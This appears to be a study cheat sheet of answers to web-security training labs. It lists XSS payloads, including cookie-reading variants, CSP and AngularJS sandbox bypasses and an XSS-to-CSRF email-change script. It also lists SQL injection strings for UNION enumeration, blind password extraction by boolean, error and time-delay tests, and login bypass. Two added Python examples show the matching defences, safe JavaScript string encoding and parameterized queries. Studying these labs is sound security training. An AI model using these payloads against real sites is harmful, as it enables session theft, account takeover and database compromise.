Reflected DOM XSS - quotes escaped, backslash not
\"-alert(1)}//

Reflected XSS into HTML context with no encoding
<script>alert(1)</script>

Reflected XSS into HTML context with most tags and attributes blocked
<iframe src="https://vulnerable-site.com/?param=%22%3E%3Cbody%20onresize=alert(document.cookie)%3E" onload=this.style.width='100px'>

Reflected XSS into HTML context with all tags blocked except custom ones using onfocus
<script>location = 'https://vulnerable-site.com/?param=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';</script>

Reflected XSS with event handlers and href attributes blocked
https://vulnerable-site.com/?param=%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20here%3C%2Ftext%3E%3C%2Fa%3E

Reflected XSS with some SVG markup allowed using onbegin
https://vulnerable-site.com/?param=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E

Reflected XSS into attribute with angle brackets HTML-encoded
"onmouseover="alert(1)

Stored XSS into HTML context with nothing encoded
<script>alert(1)</script>

Stored XSS into anchor href attribute with double quotes HTML-encoded
javascript:alert(1)

Reflected XSS in canonical link tag using OS access keys
https://vulnerable-site.com/?%27accesskey=%27x%27onclick=%27alert(1)

Reflected XSS into a JavaScript string with single quote and backslash escaped
</script><script>alert(1)</script>

Reflected XSS into a JavaScript string with angle brackets HTML encoded
'-alert(1)-'

Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped
test'payload
test\payload
\'-alert(1)//

Reflected XSS in a JavaScript URL with some characters blocked
https://vulnerable-site.com/post?postId=5&%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27

Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped
http://foo?'-alert(1)-'

Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped
${alert(1)}

Reflected XSS with AngularJS sandbox escape without strings
https://vulnerable-site.com/?search=1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1

Reflected XSS with AngularJS sandbox escape and CSP
<script>location='https://vulnerable-site.com/?search=%3Cinput%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27%3E#x';</script>

DOM XSS in document.write sink using source location.search
"><svg onload=alert(1)>

DOM XSS in document.write sink using source location.search inside a select element
param?paramId=1&storeId="></select><img%20src=1%20onerror=alert(1)>

DOM XSS in innerHTML sink using source location.search
<img src=1 onerror=alert(1)>

DOM XSS in jQuery anchor href attribute sink using location.search source
javascript:alert(document.cookie)

DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded
{{$on.constructor('alert(1)')()}}

Stored DOM XSS
<><img src=1 onerror=alert(1)>

Exploiting XSS to perform CSRF
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get', '/site-endpoint', true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/site-endpoint/request', true);
    changeReq.send('csrf=' + token + '&[email protected]');
}
</script>

Reflected XSS protected by CSP, with CSP bypass
https://vulnerable-site.com/?search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&token=;script-src-elem%20%27unsafe-inline%27
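The first entry (quotes escaped, backslash not) and the "single quote and backslash escaped" entry both come down to how a server encodes a value into a JavaScript string inside a script block. The Python below is an added example, not code from the original post: it contrasts a quote-only escaper with a JSON-based one, and includes a small scanner that reads the resulting literal the way a JavaScript parser would and reports whatever lands outside the string. The function names and the sample values are assumptions made for this demonstration.

```python
import json

# Constructed sample input: the value from the first lab entry on this page.
# Python source '\\"' is one backslash followed by one double quote.
PAYLOAD = '\\"-alert(1)}//'


def naive_js_string(value: str) -> str:
    """Escape only the double quote, the mistake in 'quotes escaped, backslash not'.
    A leading backslash in the input neutralises the escaping backslash, so the
    quote that follows closes the literal early."""
    return '"' + value.replace('"', '\\"') + '"'


def safe_js_string(value: str) -> str:
    """Encode as a JSON string literal (escapes backslash, quotes, control
    characters and, with the default ensure_ascii, all non-ASCII), then escape
    < > & as \\uXXXX so the literal can never terminate the enclosing
    <script> element or be misread in an HTML attribute."""
    literal = json.dumps(value)
    return (literal.replace('<', '\\u003c')
                   .replace('>', '\\u003e')
                   .replace('&', '\\u0026'))


def code_after_literal(literal: str) -> str:
    """Scan a double-quoted JS string literal as a JS tokenizer does and return
    whatever follows its closing quote. An empty result means the whole value
    stayed inside the string; anything else would execute as code."""
    if not literal.startswith('"'):
        raise ValueError("expected a double-quoted literal")
    i = 1
    while i < len(literal):
        ch = literal[i]
        if ch == '\\':
            i += 2          # an escape consumes the next character, whatever it is
            continue
        if ch == '"':
            return literal[i + 1:]
        i += 1
    raise ValueError("unterminated string literal")


def closes_script_block(literal: str) -> bool:
    """The HTML parser ends a <script> element at '</script' regardless of JS
    string syntax, which is why quote escaping alone does not help in the
    'single quote and backslash escaped' entry."""
    return '</script' in literal.lower()


if __name__ == "__main__":
    for encoder in (naive_js_string, safe_js_string):
        literal = encoder(PAYLOAD)
        print(encoder.__name__, literal, "-> outside literal:", repr(code_after_literal(literal)))
    print("naive closes script:", closes_script_block(naive_js_string('</script><script>alert(1)</script>')))
    print("safe closes script:", closes_script_block(safe_js_string('</script><script>alert(1)</script>')))
```

Running it shows the quote-only escaper leaving `-alert(1)}//"` outside the string for the page's first payload, while the JSON-based encoder keeps the entire value inside the literal and turns `</script>` into `\u003c/script\u003e`, so neither the JavaScript tokenizer nor the HTML parser sees a boundary in attacker-controlled data.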
SQL injection UNION attack, determining the number of columns returned by the query
'+UNION+SELECT+NULL--
--Keep adding more NULL values, noting unique responses

SQL injection UNION attack, finding a column containing text
'+UNION+SELECT+NULL
--Keep adding more NULL values, noting unique responses (# of columns)
'+UNION+SELECT+'abcdef',NULL,NULL--
--Try string value in each NULL, denoting unique responses

SQL injection UNION attack, retrieving data from other tables
'+UNION+SELECT+NULL
--Keep adding more NULL values, noting unique responses (# of columns)
'+UNION+SELECT+'abcdef',NULL,NULL--
--Try string value in each NULL, denoting unique responses
'+UNION+SELECT+'abc','def'--
--Ex: 2 columns containing text
'+UNION+SELECT+col_name1,+col_name2+FROM+table_name--
--Retrieve contents from table

SQL injection UNION attack, retrieving multiple values in a single column
'+UNION+SELECT+NULL
--Keep adding more NULL values, noting unique responses (# of columns)
'+UNION+SELECT+'abcdef',NULL,NULL--
--Try string value in each NULL, denoting unique responses
--Retrieving contents of table_name, where col_name1 & col_name2 are columns:
'+UNION+SELECT+NULL,col_name1||'~'||col_name2+FROM+table_name--

SQL injection attack, querying the database type and version on Oracle
'+UNION+SELECT+NULL
--Keep adding more NULL values, noting unique responses (# of columns)
'+UNION+SELECT+'abcdef',NULL,NULL--
--Try string value in each NULL, denoting unique responses
'+UNION+SELECT+'abc','def'+FROM+DUAL--
--Ex: 2 columns w/ text
'+UNION+SELECT+BANNER,+NULL+FROM+v$version--
--Display DB version

SQL injection attack, querying the database type and version on MySQL and Microsoft
'+UNION+SELECT+NULL
--Keep adding more NULL values, noting unique responses (# of columns)
'+UNION+SELECT+'abcdef',NULL,NULL--
--Try string value in each NULL, denoting unique responses
'+UNION+SELECT+'abc','def'#
--Ex: 2 columns w/ text
'+UNION+SELECT+@@version,+NULL#
--Display DB version

SQL injection attack, listing the database contents on non-Oracle databases
'+UNION+SELECT+NULL
--Keep adding more NULL values, noting unique responses (# of columns)
'+UNION+SELECT+'abcdef',NULL,NULL--
--Try string value in each NULL, denoting unique responses
'+UNION+SELECT+'abc','def'--
--Ex: 2 columns w/ text
--Retrieve the list of tables in the database:
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

SQL injection attack, listing the database contents on Oracle
'+UNION+SELECT+NULL
--Keep adding more NULL values, noting unique responses (# of columns)
'+UNION+SELECT+'abcdef',NULL,NULL--
--Try string value in each NULL, denoting unique responses
'+UNION+SELECT+'abc','def'+FROM+DUAL--
--Ex: 2 columns w/ text
--Retrieve the list of tables in the database:
'+UNION+SELECT+table_name,NULL+FROM+all_tables--
--Retrieve the details of the columns in the table:
'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_ABCDEF'--
--Retrieving particular columns in a table:
'+UNION+SELECT+COL_NAME1,+COL_NAME2+FROM+TABLE_NAME--

Blind SQL injection with conditional responses
--Tracking cookie e.g. TrackingId=xyz. Testing boolean conditions to observe response.
TrackingId=xyz' AND '1'='1
TrackingId=xyz' AND '1'='2
--Test for existence of a particular table - 'table_name'
TrackingId=xyz' AND (SELECT 'a' FROM table_name LIMIT 1)='
--Test for existence of a particular user - 'user_name'
TrackingId=xyz' AND (SELECT 'a' FROM table_name WHERE col_name='user_name')='a
--Determine the # of chars. in password of user_name above. If true, char. length > 1
TrackingId=xyz' AND (SELECT 'a' FROM table_name WHERE col_name='user_name' AND LENGTH(password)>1)='a
--Follow-up tests for password length, incrementing 'n'
TrackingId=xyz' AND (SELECT 'a' FROM table_name WHERE col_name='user_name' AND LENGTH(password)>n)='a
--Extract a single character from the password, and test it against a specific value. Increment 'n' each cycle.
TrackingId=xyz' AND (SELECT SUBSTRING(password,n,1) FROM table_name WHERE col_name='user_name')='a

Blind SQL injection with conditional errors
--Assume tracking cookie, modify its value, check for response
TrackingId=xyz'
TrackingId=xyz''
--Confirm that the server is interpreting the injection as a SQL query - valid/invalid?
TrackingId=xyz'||(SELECT '')||'
--Oracle database?
TrackingId=xyz'||(SELECT '' FROM dual)||'
--Submitting an invalid query while still preserving valid SQL syntax to verify if injection is being processed as
--a SQL query by the back-end if error is returned
TrackingId=xyz'||(SELECT '' FROM not-a-real-table)||'
--Verifying existence of a particular table - 'table_name'. If no error, likely exists.
TrackingId=xyz'||(SELECT '' FROM table_name WHERE ROWNUM = 1)||'
--Check for error message, triggering errors conditionally on truth of a condition (1=1) or (1=2)
TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
TrackingId=xyz'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
--Check for existence of particular username - 'user_name'. If error arises, likely exists.
TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||'
--Determine # of chars in the password of the user_name discovered above
TrackingId=xyz'||(SELECT CASE WHEN length(password)>1 THEN to_char(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||'
--Testing password lengths, increment length until error disappears
TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>2 THEN TO_CHAR(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||'
--Increment 'n' to extract a single character from the password, and test it against a specific value
TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,n,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||'

Blind SQL injection with time delays
--Tracking cookie, SQLi
TrackingId=x'||pg_sleep(10)--

Blind SQL injection with time delays and information retrieval
--App with tracking cookie, testing for time delay
TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
--Testing for particular table and column
TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name--
--Determining # of chars in col_name (insert_name)
TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name'+AND+length(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name--
--Increment 'n' to test different password lengths. Correct length is determined once there is no time delay.
TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name'+AND+length(password)>n)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name--
--Testing match for each password char. Start 'n' at 1, increment until password length determined above.
TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name'+AND+substring(password,n,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name--

SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
'+OR+1=1--

SQL injection vulnerability allowing login bypass
administrator'--
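Every SQL injection entry above, the UNION probes and the three blind techniques as much as the two WHERE-clause labs, depends on the application splicing the supplied value into the SQL text. The following Python is an added example, not code from the original post: it builds an in-memory SQLite database with constructed sample rows and runs the page's `administrator'--` and `' OR 1=1--` inputs through a concatenated query and through a parameterized one, so the difference in what the database actually sees can be observed directly. Table names, column names and the sample data are assumptions made for this demonstration.

```python
import sqlite3

# Constructed sample data for the demonstration (not from the page).
USERS = [("administrator", "admin-password-placeholder"), ("wiener", "peter")]
PRODUCTS = [("Gift Card", "Gifts", 1), ("Unreleased Gadget", "Gifts", 0), ("Lamp", "Home", 1)]


def make_db() -> sqlite3.Connection:
    """Create an in-memory database with a users table (login bypass lab) and a
    products table with a released flag (hidden-data lab)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("CREATE TABLE products (name TEXT, category TEXT, released INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    conn.commit()
    return conn


def login_concat(conn, username: str, password: str) -> list:
    """Vulnerable: the username is pasted into the SQL text, so a quote ends the
    string and a -- comment discards the password check entirely."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return sorted(row[0] for row in conn.execute(sql))


def login_param(conn, username: str, password: str) -> list:
    """Hardened: placeholders send the value as data; the quote and the comment
    are compared as ordinary characters of a username that does not exist."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(sql, (username, password)))


def products_concat(conn, category: str) -> list:
    """Vulnerable: the category filter is concatenated, so ' OR 1=1-- turns the
    WHERE clause into a tautology and comments out the released = 1 condition."""
    sql = ("SELECT name FROM products WHERE category = '" + category
           + "' AND released = 1")
    return sorted(row[0] for row in conn.execute(sql))


def products_param(conn, category: str) -> list:
    """Hardened: the released = 1 condition is part of the fixed query text and
    cannot be commented out by anything inside the bound value."""
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return sorted(row[0] for row in conn.execute(sql, (category,)))


if __name__ == "__main__":
    db = make_db()
    print("login, concatenated:", login_concat(db, "administrator'--", "wrong"))
    print("login, parameterized:", login_param(db, "administrator'--", "wrong"))
    print("products, concatenated:", products_concat(db, "' OR 1=1--"))
    print("products, parameterized:", products_param(db, "' OR 1=1--"))
```

With the concatenated queries the login returns the administrator row for a wrong password and the product search returns the unreleased item; with bound parameters both return nothing, because the quote, the `--` and the `OR 1=1` never reach the SQL parser. The same holds for the `||`-concatenated and `pg_sleep` payloads listed above: a bound parameter is a value, so no CASE expression or subquery inside it is ever evaluated.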
March 2021